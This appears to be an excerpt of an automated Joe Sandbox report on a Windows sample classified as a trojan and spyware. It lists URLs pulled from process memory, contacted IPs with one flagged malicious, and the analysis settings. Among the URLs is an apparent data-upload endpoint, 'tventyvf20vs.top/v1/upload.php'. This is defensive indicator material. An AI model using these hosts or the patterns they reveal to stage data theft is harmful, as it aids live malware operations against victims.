                                                                      https://github.com/ActiveState/appdirs/issues/79z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://core.telegram.org/bots/api#messageautodeletetimerchangedz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://core.telegram.org/bots/api#birthdatez2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://core.telegram.org/bots/api#closeforumtopicz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://blog.jaraco.com/skeletonz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.all_uniquez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.partial_productz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.map_exceptz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.takewhile_inclusivez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.powersetz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.zip_offsetz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://digitalassets.lib.berkeley.edu/sdtr/ucb/text/34.pdfz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1924564794.000001E7D3015000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://core.telegram.org/bots/api#setchatmenubuttonz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.pad_nonez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://core.telegram.org/bots/api#hidegeneralforumtopicz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://website-cdn.ipinfo.io/_next/static/media/twitter-light.c8dff709.svgwab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://core.telegram.org/bots/api#backgroundtypefillz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://core.telegram.org/bots/api#restrictchatmemberz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://127.0.0.1BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://core.telegram.org/bots/api#sendanimationz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://www.ecosia.org/newtab/j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://lv.queniujq.cnBitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://website-cdn.ipinfo.io/_next/static/chunks/pages/_app-ec5587be2943f5e8.jswab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://core.telegram.org/bots/api#revenuewithdrawalstatependingz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://docs.python.org/3.8/library/zipfile.html#path-objectsz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=enBitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://core.telegram.org/bots/api#startransactionz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.ncyclesz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://readthedocs.org/projects/PROJECT_RTD/badge/?version=latestz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://core.telegram.org/bots/api#menubuttoncommandsz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://ipinfo.io/wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/l?subset_id=2&fvd=n6&v=3wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://core.telegram.org/bots/api#backgroundtypewallpaperz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://toml.io/en/v1.0.0).z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://core.telegram.org/bots/api#paidmediapreviewz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921971752.000001E7D2E6C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.consumerz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://core.telegram.org/bots/api#botdescriptionz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://github.com/toml-lang/compliance)z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://github.com/hukkin/mdformat-toc)z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_combination_with_replacez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.interspersez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://p.typekit.net/p.css?s=1&k=qls3unz&ht=tk&f=139.140.169.173.175.176&a=78030932&app=typekit&e=cwab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://html4/loose.dtdRXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1971130761.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1803265464.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                    https://website-cdn.ipinfo.io/_next/static/sha-16cdb99/_buildManifest.jswab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://core.telegram.org/bots/api#declinechatjoinrequestz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.collapsez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://core.telegram.org/bots/api#reopengeneralforumtopicz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://help.steampowered.com/en/BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://core.telegram.org/bots/api#deleteforumtopicz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.onez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://core.telegram.org/bots/api#forumtopiceditedz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://core.telegram.org/bots/api#reactiontypeemojiz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://core.telegram.org/bots/api#paidmediavideoz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://tventyvf20vs.top/v1/upload.phpj1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2024792929.0000000001405000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.000000000139E000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2088697312.0000000001412000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.countablez2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.matmulz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://cdn.ipinfo.io/static/deviceicons/apple-icon-precomposed.pngwab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.prependz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.product_indexz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://core.telegram.org/bots/api#setchattitlez2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://github.com/hukkin/tomliz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.set_partitionsz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.onlyz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://core.telegram.org/bots/api#forumtopicclosedz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.distinct_permutationsz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://website-cdn.ipinfo.io/_next/static/css/48a60a7883388932.csswab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://core.telegram.org/bots/api#giveawaycompletedz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_combinationz2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://.jpgRXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1971130761.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1803265464.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eBitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://core.telegram.org/bots/api#editmessagetextz2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              104.21.51.224
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              104.26.9.59
                                                                                                                                                                                                                              api.myip.comUnited States
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              34.117.59.81
                                                                                                                                                                                                                              ipinfo.ioUnited States
                                                                                                                                                                                                                              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                              104.26.5.15
                                                                                                                                                                                                                              db-ip.comUnited States
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              103.130.147.211
                                                                                                                                                                                                                              unknownTurkey
                                                                                                                                                                                                                              63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDfalse
                                                                                                                                                                                                                              45.91.200.135
                                                                                                                                                                                                                              unknownNetherlands
                                                                                                                                                                                                                              204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse
                                                                                                                                                                                                                              149.154.167.220
                                                                                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              104.102.49.254
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                              5.53.124.195
                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                              49505SELECTELRUtrue
                                                                                                                                                                                                                              104.26.13.205
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              173.231.16.77
                                                                                                                                                                                                                              api64.ipify.orgUnited States
                                                                                                                                                                                                                              18450WEBNXUSfalse
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1516779
                                                                                                                                                                                                                              Start date and time:2024-09-24 15:33:19 +02:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 14m 52s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:30
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@32/3095@5/12
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 83.3%
                                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 20.189.173.21
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                              • Execution Graph export aborted for target j1XaE_3LRXkWT1prPdjt1dhT.exe, PID 1736 because it is empty
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
